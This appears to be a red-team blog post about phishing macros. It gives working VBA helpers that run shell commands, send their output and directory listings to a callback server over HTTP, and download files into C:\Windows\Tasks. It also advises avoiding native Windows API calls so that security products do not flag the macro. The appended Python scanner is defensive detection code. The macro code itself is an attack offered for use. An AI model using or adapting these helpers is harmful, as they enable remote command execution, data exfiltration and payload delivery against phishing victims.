
Don't Go Phishing Blind, Watch While RunTime

Raise your hand if you crafted your payload carefully and it worked well on your lab machines, but in the real scenario you're not receiving the callback! I guess all of us have experienced this at some point.

To solve this, I wrote a simple yet effective set of functions that let us see what is going on while our script runs.

The first subroutine, which I called Hello, simply sends a GET request to a specified server.

Sub Hello(message)
	On Error GoTo Done
	Dim MyRequest As Object
	Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
	MyRequest.Open "GET", _
	"" & message
	' Send Request.
	MyRequest.Send
	Set MyRequest = Nothing
Done:
	Exit Sub
End Sub

This is the most important one, since we rely on the HTTP protocol to call home after executing an action.

The second important one is ShellRun; this function runs a system command and returns the command's captured output.

Function ShellRun(sCmd As String) As String
	'Run a shell command, returning the output as a string
	Dim oShell As Object
	Set oShell = CreateObject("WScript.Shell")

	'run command
	Dim oExec As Object
	Dim oOutput As Object
	Set oExec = oShell.Exec(sCmd)
	Set oOutput = oExec.StdOut

	'handle the results as they are written to and read from the StdOut object
	Dim s As String
	Dim sLine As String
	While Not oOutput.AtEndOfStream
		sLine = oOutput.ReadLine
		If sLine <> "" Then s = s & sLine & vbCrLf
	Wend

	ShellRun = s
End Function

In conjunction with Hello, this gives us visibility into what is going on while our phishing script runs.

Hello (ShellRun("ping"))


One of the other helpers I wrote is LoopThroughFiles(); it prints the contents of the provided directory.

Sub LoopThroughFiles(path)
	On Error GoTo Done
	Dim oFSO As Object
	Dim oFolder As Object
	Dim oFile As Object
	Dim i As Integer

	Set oFSO = CreateObject("Scripting.FileSystemObject")
	Set oFolder = oFSO.GetFolder(path)

	For Each oFile In oFolder.Files
		Hello (oFile.Name)
		i = i + 1
	Next oFile
Done:
	Exit Sub
End Sub

The subroutine relies on the Hello subroutine and can be used as shown below:

LoopThroughFiles ("C:\Windows\Tasks")

I will finish this post with an extra subroutine that downloads text files, not binary files.

Sub WantMe(pie)
	Dim myURL As String
	myURL = "" & pie

	Dim WinHttpReq As Object
	Dim oStream As Object
	Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
	WinHttpReq.Open "GET", myURL, False, Null, Null
	WinHttpReq.Send

	If WinHttpReq.Status = 200 Then
		Set oStream = CreateObject("ADODB.Stream")
		oStream.Open
		oStream.Type = 1 ' 1 = binary
		oStream.Write WinHttpReq.responseBody
		oStream.SaveToFile "C:\Windows\Tasks\" & pie, 2 ' 1 = no overwrite, 2 = overwrite
		oStream.Close
	End If
End Sub

Nothing really special here, just a set of helper functions to make things easier. If you noticed, we have not used the native Windows API, and that is for a reason: portability of the code (few changes) when porting it to VBS/HTA. Also, using the native Windows API in a macro could be treated as a red flag by a security product.

Thanks for reading!
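Seen from the detection side, helpers like these contain no Declare statements, so a macro triage rule has to key on the COM ProgIDs passed to CreateObject instead. The following is an added example, not code from the original post: a Python scan of extracted macro source, where the capability labels, the function names and the sample macro are all constructed for illustration.

```python
import re

# COM ProgIDs used by the helpers in this post, grouped by capability.
PROGID_CAPABILITY = {
    "winhttp.winhttprequest.5.1": "http",
    "microsoft.xmlhttp": "http",
    "wscript.shell": "exec",
    "scripting.filesystemobject": "fs",
    "adodb.stream": "file_write",
}
# Capability pairs that matter more together than alone.
COMBINATIONS = [
    ({"exec", "http"}, "command output can be sent over HTTP"),
    ({"fs", "http"}, "directory listing can be sent over HTTP"),
    ({"http", "file_write"}, "HTTP response can be written to disk"),
]
CREATEOBJECT_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.IGNORECASE)
DECLARE_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?"
                        r"(?:Function|Sub)\b", re.IGNORECASE | re.MULTILINE)

def strip_comments(source):
    """Remove VBA comments (' to end of line) that sit outside string literals."""
    cleaned = []
    for line in source.splitlines():
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:i]
                break
        cleaned.append(line)
    return "\n".join(cleaned)

def scan_macro(source):
    """Return capabilities, native API Declare count and combined findings."""
    code = strip_comments(source)
    caps = {PROGID_CAPABILITY[p.lower()] for p in CREATEOBJECT_RE.findall(code)
            if p.lower() in PROGID_CAPABILITY}
    findings = [msg for needed, msg in COMBINATIONS if needed <= caps]
    return {"capabilities": caps, "findings": findings,
            "native_api_declares": len(DECLARE_RE.findall(code))}

# Constructed sample macro source, not taken from a real document.
SAMPLE = '''Sub AutoOpen()
    ' CreateObject("ADODB.Stream") inside a comment must not count
    Set h = CreateObject("WinHttp.WinHttpRequest.5.1")
    Set sh = CreateObject("wscript.shell")
End Sub'''
```

Static ProgID matching is a triage signal; pair it with endpoint telemetry for Office processes spawning child processes or making outbound HTTP requests.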


Please feel free to ping me on X @tahadraidia.